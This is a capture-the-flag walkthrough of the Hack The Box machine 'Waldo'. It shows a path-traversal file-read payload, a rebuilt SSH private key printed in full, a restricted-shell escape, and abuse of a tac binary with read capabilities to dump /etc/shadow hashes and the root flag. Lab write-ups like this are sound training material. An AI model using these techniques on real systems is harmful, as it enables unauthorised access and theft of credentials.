HTB: Waldo

Details

This machine is Waldo from Hack The Box

Recon

root@kali:~# nmap -sV -p- -T4 10.10.10.87
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-04 16:54 EDT
Nmap scan report for 10.10.10.87
Host is up (0.060s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH 7.5 (protocol 2.0)
80/tcp   open     http           nginx 1.12.2
8888/tcp filtered sun-answerbook

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.29 seconds

User

Started on port 80

Screenshot 1

I clicked on the various options while monitoring the endpoints hit with the dev tools network tab

Screenshot 2

The data looked interesting so I fired up burp and clicked the name of one of them

Screenshot 3

I sent this to repeater and tried LFI

../../../../../../../etc/passwd

Screenshot 4

So I tried some bypasses encase there were any protections

Screenshot 5

So I had LFI, and interestingly the nobody user has a home directory. As fileRead.php allowed LFI, I tried readDir.php to see if I could get directory listings

Screenshot 6

Screenshot 7

The .monitor file caught my attention so I used my LFI to read it

Screenshot 8

I rebuilt the key

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAs7sytDE++NHaWB9e+NN3V5t1DP1TYHc+4o8D362l5Nwf6Cpl
mR4JH6n4Nccdm1ZU+qB77li8ZOvymBtIEY4Fm07X4Pqt4zeNBfqKWkOcyV1TLW6f
87s0FZBhYAizGrNNeLLhB1IZIjpDVJUbSXG6s2cxAle14cj+pnEiRTsyMiq1nJCS
dGCc/gNpW/AANIN4vW9KslLqiAEDJfchY55sCJ5162Y9+I1xzqF8e9b12wVXirvN
o8PLGnFJVw6SHhmPJsue9vjAIeH+n+5Xkbc8/6pceowqs9ujRkNzH9T1lJq4Fx1V
vi93Daq3bZ3dhIIWaWafmqzg+jSThSWOIwR73wIDAQABAoIBADHwl/wdmuPEW6kU
vmzhRU3gcjuzwBET0TNejbL/KxNWXr9B2I0dHWfg8Ijw1Lcu29nv8b+ehGp+bR/6
pKHMFp66350xylNSQishHIRMOSpydgQvst4kbCp5vbTTdgC7RZF+EqzYEQfDrKW5
8KUNptTmnWWLPYyJLsjMsrsN4bqyT3vrkTykJ9iGU2RrKGxrndCAC9exgruevj3q
1h+7o8kGEpmKnEOgUgEJrN69hxYHfbeJ0Wlll8Wort9yummox/05qoOBL4kQxUM7
VxI2Ywu46+QTzTMeOKJoyLCGLyxDkg5ONdfDPBW3w8O6UlVfkv467M3ZB5ye8GeS
dVa3yLECgYEA7jk51MvUGSIFF6GkXsNb/w2cZGe9TiXBWUqWEEig0bmQQVx2ZWWO
v0og0X/iROXAcp6Z9WGpIc6FhVgJd/4bNlTR+A/lWQwFt1b6l03xdsyaIyIWi9xr
xsb2sLNWP56A/5TWTpOkfDbGCQrqHvukWSHlYFOzgQa0ZtMnV71ykH0CgYEAwSSY
qFfdAWrvVZjp26Yf/jnZavLCAC5hmho7eX5isCVcX86MHqpEYAFCecZN2dFFoPqI
yzHzgb9N6Z01YUEKqrknO3tA6JYJ9ojaMF8GZWvUtPzN41ksnD4MwETBEd4bUaH1
/pAcw/+/oYsh4BwkKnVHkNw36c+WmNoaX1FWqIsCgYBYw/IMnLa3drm3CIAa32iU
LRotP4qGaAMXpncsMiPage6CrFVhiuoZ1SFNbv189q8zBm4PxQgklLOj8B33HDQ/
lnN2n1WyTIyEuGA/qMdkoPB+TuFf1A5EzzZ0uR5WLlWa5nbEaLdNoYtBK1P5n4Kp
w7uYnRex6DGobt2mD+10cQKBgGVQlyune20k9QsHvZTU3e9z1RL+6LlDmztFC3G9
1HLmBkDTjjj/xAJAZuiOF4Rs/INnKJ6+QygKfApRxxCPF9NacLQJAZGAMxW50AqT
rj1BhUCzZCUgQABtpC6vYj/HLLlzpiC05AIEhDdvToPK/0WuY64fds0VccAYmMDr
X/PlAoGAS6UhbCm5TWZhtL/hdprOfar3QkXwZ5xvaykB90XgIps5CwUGCCsvwQf2
DvVny8gKbM/OenwHnTlwRTEj5qdeAM40oj/mwCDc6kpV1lJXrW2R5mCH9zgbNFla
W0iKCBUAm5xZgU/YskMsCBMNmA8A5ndRWGFEFE+VGDVPaRie0ro=
-----END RSA PRIVATE KEY-----

Which I saved and chmodded. I then tried it on ssh

root@kali:~# ssh nobody@10.10.10.87 -i ./key
Welcome to Alpine!

The Alpine Wiki contains a large amount of how-to guides and general
information about administrating Alpine systems.
See <http://wiki.alpinelinux.org>.
waldo:~$ 

The alpine part made me think it was a docker container.

waldo:~$ ls -la
total 20
drwxr-xr-x    1 nobody   nobody        4096 Jul 24  2018 .
drwxr-xr-x    1 root     root          4096 May  3  2018 ..
lrwxrwxrwx    1 root     root             9 Jul 24  2018 .ash_history -> /dev/null
drwx------    1 nobody   nobody        4096 Jul 15  2018 .ssh
-rw-------    1 nobody   nobody        1202 Jul 24  2018 .viminfo
-r--------    1 nobody   nobody          33 May  3  2018 user.txt

waldo:~$ cat user.txt
[REDACTED]

But there was the user flag. I began to dig into the system and found I was actually connected to port 8888

waldo:/$ netstat -anlp
netstat: can't scan /proc - are you root?
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.10.87:8888        10.10.14.2:60490        ESTABLISHED -
tcp        0      0 :::80                   :::*                    LISTEN      -
tcp        0      0 :::22                   :::*                    LISTEN      -
tcp        0      0 :::8888                 :::*                    LISTEN      -
udp        0      0 10.10.10.87:41769       10.10.10.2:53           ESTABLISHED -

So what was actually running on port 22? I tried ssh again with the key

waldo:/$ ssh monitor@localhost -i ~/.ssh/.monitor 
Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64
           &.                                                                  
          @@@,@@/ %                                                            
       #*/%@@@@/.&@@,                                                          
   @@@#@@#&@#&#&@@@,*%/                                                        
   /@@@&###########@@&*(*                                                      
 (@################%@@@@@.     /**                                             
 @@@@&#############%@@@@@@@@@@@@@@@@@@@@@@@@%((/                               
 %@@@@%##########&@@@....                 .#%#@@@@@@@#                         
 @@&%#########@@@@/                        */@@@%(((@@@%                       
    @@@#%@@%@@@,                       *&@@@&%(((#((((@@(                      
     /(@@@@@@@                     *&@@@@%((((((((((((#@@(                     
       %/#@@@/@ @#/@          ..@@@@%(((((((((((#((#@@@@@@@@@@@@&#,            
          %@*(@#%@.,       /@@@@&(((((((((((((((&@@@@@@&#######%%@@@@#    &    
        *@@@@@#        .&@@@#(((#(#((((((((#%@@@@@%###&@@@@@@@@@&%##&@@@@@@/   
       /@@          #@@@&#(((((((((((#((@@@@@%%%%@@@@%#########%&@@@@@@@@&     
      *@@      *%@@@@#((((((((((((((#@@@@@@@@@@%####%@@@@@@@@@@@@###&@@@@@@@&  
      %@/ .&%@@%#(((((((((((((((#@@@@@@@&#####%@@@%#############%@@@&%##&@@/   
      @@@@@@%(((((((((((##(((@@@@&%####%@@@%#####&@@@@@@@@@@@@@@@&##&@@@@@@@@@/
     @@@&(((#((((((((((((#@@@@@&@@@@######@@@###################&@@@&#####%@@* 
     @@#(((((((((((((#@@@@%&@@.,,.*@@@%#####@@@@@@@@@@@@@@@@@@@%####%@@@@@@@@@@
     *@@%((((((((#@@@@@@@%#&@@,,.,,.&@@@#####################%@@@@@@%######&@@.
       @@@#(#&@@@@@&##&@@@&#@@/,,,,,,,,@@@&######&@@@@@@@@&&%######%@@@@@@@@@@@
        @@@@@@&%&@@@%#&@%%@@@@/,,,,,,,,,,/@@@@@@@#/,,.*&@@%&@@@@@@&%#####%@@@@.
          .@@@###&@@@%%@(,,,%@&,.,,,,,,,,,,,,,.*&@@@@&(,*@&#@%%@@@@@@@@@@@@*   
            @@%##%@@/@@@%/@@@@@@@@@#,,,,.../@@@@@%#%&@@@@(&@&@&@@@@(           
            .@@&##@@,,/@@@@&(.  .&@@@&,,,.&@@/         #@@%@@@@@&@@@/          
           *@@@@@&@@.*@@@          %@@@*,&@@            *@@@@@&.#/,@/          
          *@@&*#@@@@@@@&     #@(    .@@@@@@&    ,@@@,    @@@@@(,@/@@           
          *@@/@#.#@@@@@/    %@@@,   .@@&%@@@     &@&     @@*@@*(@@#            
           (@@/@,,@@&@@@            &@@,,(@@&          .@@%/@@,@@              
             /@@@*,@@,@@@*         @@@,,,,,@@@@.     *@@@%,@@**@#              
               %@@.%@&,(@@@@,  /&@@@@,,,,,,,%@@@@@@@@@@%,,*@@,#@,              
                ,@@,&@,,,,(@@@@@@@(,,,,,.,,,,,,,,**,,,,,,.*@/,&@               
                 &@,*@@.,,,,,..,,,,&@@%/**/@@*,,,,,&(.,,,.@@,,@@               
                 /@%,&@/,,,,/@%,,,,,*&@@@@@#.,,,,,.@@@(,,(@@@@@(               
                  @@*,@@,,,#@@@&*..,,,,,,,,,,,,/@@@@,*(,,&@/#*                 
                  *@@@@@(,,@*,%@@@@@@@&&#%@@@@@@@/,,,,,,,@@                    
                       @@*,,,,,,,,,.*/(//*,..,,,,,,,,,,,&@,                    
                        @@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@                     
                        &@&,,,,,,,,,,,,,,,,,,,,,,,,,,,,&@#                     
                         %@(,,,,,,,,,,,,,,,,,,,,,,,,,,,@@                      
                         ,@@,,,,,,,,@@@&&&%&@,,,,,..,,@@,                      
                          *@@,,,,,,,.,****,..,,,,,,,,&@@                       
                           (@(,,,.,,,,,,,,,,,,,,.,,,/@@                        
                           .@@,,,,,,,,,,,,,...,,,,,,@@                         
                            ,@@@,,,,,,,,,,,,,,,,.(@@@                          
                              %@@@@&(,,,,*(#&@@@@@@,     

                            Here's Waldo, where's root?
Last login: Tue Jul 24 08:09:03 2018 from 127.0.0.1
-rbash: alias: command not found

So I got into an rbash. I tried some bypasses, eventually ending on

 waldo:/$ ssh monitor@localhost -i ~/.ssh/.monitor -t "bash -noprofile"
monitor@waldo:~$ 

That got me out of the rbash, check if my PATH is broken

monitor@waldo:~$ export
[SNIP]
declare -x PATH="/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1"
[SNIP]

It's broken, so I export a replacement

monitor@waldo:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

And began to look around

monitor@waldo:~$ cd app-dev
monitor@waldo:~/app-dev$ ls -la
total 2236
drwxrwx--- 3 app-dev monitor    4096 May  3  2018 .
drwxr-x--- 5 root    monitor    4096 Jul 24  2018 ..
-rwxrwx--- 1 app-dev monitor   13704 Jul 24  2018 logMonitor
-r--r----- 1 app-dev monitor   13704 May  3  2018 logMonitor.bak
-rw-rw---- 1 app-dev monitor    2677 May  3  2018 logMonitor.c
-rw-rw---- 1 app-dev monitor     488 May  3  2018 logMonitor.h
-rw-rw---- 1 app-dev monitor 2217712 May  3  2018 logMonitor.h.gch
-rw-rw---- 1 app-dev monitor    6824 May  3  2018 logMonitor.o
-rwxr----- 1 app-dev monitor     266 May  3  2018 makefile
-r-xr-x--- 1 app-dev monitor     795 May  3  2018 .restrictScript.sh
drwxr-x--- 2 app-dev monitor    4096 May  3  2018 v0.1

I checked the logmonitor

monitor@waldo:~/app-dev$ ./logMonitor -a
Cannot open file 

It can't read the file, so I look further

monitor@waldo:~/app-dev$ cd v0.1/
monitor@waldo:~/app-dev/v0.1$ ls -la
total 24
drwxr-x--- 2 app-dev monitor  4096 May  3  2018 .
drwxrwx--- 3 app-dev monitor  4096 May  3  2018 ..
-r-xr-x--- 1 app-dev monitor 13706 May  3  2018 logMonitor-0.1

monitor@waldo:~/app-dev/v0.1$ ./logMonitor-0.1 -a
Oct  4 17:17:01 waldo CRON[987]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct  4 17:17:01 waldo CRON[987]: pam_unix(cron:session): session closed for user root
Oct  4 17:19:38 waldo sshd[1001]: User nobody from 127.0.0.1 not allowed because not listed in AllowUsers
Oct  4 17:19:38 waldo sshd[1001]: input_userauth_request: invalid user nobody [preauth]
Oct  4 17:19:38 waldo sshd[1001]: Connection closed by 127.0.0.1 port 37046 [preauth]
Oct  4 17:25:09 waldo sshd[1008]: User nobody from 127.0.0.1 not allowed because not listed in AllowUsers
Oct  4 17:25:09 waldo sshd[1008]: input_userauth_request: invalid user nobody [preauth]
[SNIP]

This one can. But the permissions aren't different, so I checked it's capabilities

monitor@waldo:~/app-dev/v0.1$ getcap logMonitor-0.1 
logMonitor-0.1 = cap_dac_read_search+ei

But I couldn't see any way of using this to spawn a shell or priv esc. So I decided to scan for any other files that have modified capabilities

monitor@waldo:~/app-dev/v0.1$ getcap -r / 2>/dev/null
/usr/bin/tac = cap_dac_read_search+ei
/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei

So tac has access to read files

monitor@waldo:~/app-dev/v0.1$ tac /etc/shadow
app-dev:$6$RQ4VUGfn$6WYq54MO9AvNFMW.FCRekOBPYJXuI02AqR5lYlwN5/eylTlTWmHlLLvJ4FDp4Nt0A/AX2b3zdrvyEfwf8vSh3/:17654:0:99999:7:::
monitor:$6$IXQ7fATd$RsOewky58ltAbfdjYBHFk9/q5bRcUplLnM9ZHKknVB46smsKn4msCOXDpyYU6xw43rGqJl5fG3sMmEaKhJAJt/:17654:0:99999:7:::
steve:$6$MmXo3me9$zPPUertAwnJYQM8GUya1rzCTKGr/AHtjSG2n3faSeupCCBjoaknUz2YUDStZtvUGWuXonFqXKZF8pXCkezJ.Q.:17653:0:99999:7:::
sshd:*:17653:0:99999:7:::
messagebus:*:17653:0:99999:7:::
avahi-autoipd:*:17653:0:99999:7:::
_apt:*:17653:0:99999:7:::
systemd-bus-proxy:*:17653:0:99999:7:::
systemd-resolve:*:17653:0:99999:7:::
systemd-network:*:17653:0:99999:7:::
systemd-timesync:*:17653:0:99999:7:::
nobody:*:17653:0:99999:7:::
gnats:*:17653:0:99999:7:::
irc:*:17653:0:99999:7:::
list:*:17653:0:99999:7:::
backup:*:17653:0:99999:7:::
www-data:*:17653:0:99999:7:::
proxy:*:17653:0:99999:7:::
uucp:*:17653:0:99999:7:::
news:*:17653:0:99999:7:::
mail:*:17653:0:99999:7:::
lp:*:17653:0:99999:7:::
man:*:17653:0:99999:7:::
games:*:17653:0:99999:7:::
sync:*:17653:0:99999:7:::
sys:*:17653:0:99999:7:::
bin:*:17653:0:99999:7:::
daemon:*:17653:0:99999:7:::
root:$6$tRIbOmog$v7fPb8FKIT0QryKrm7RstojMs.ZXi4xxHz2Uix9lsw52eWtsURc9dwWMOyt4Gpd6QLtVtDnU1NO5KE5gF48r8.:17654:0:99999:7:::

So I can read shadow, so I can also read the flag

monitor@waldo:~/app-dev/v0.1$ tac /root/root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *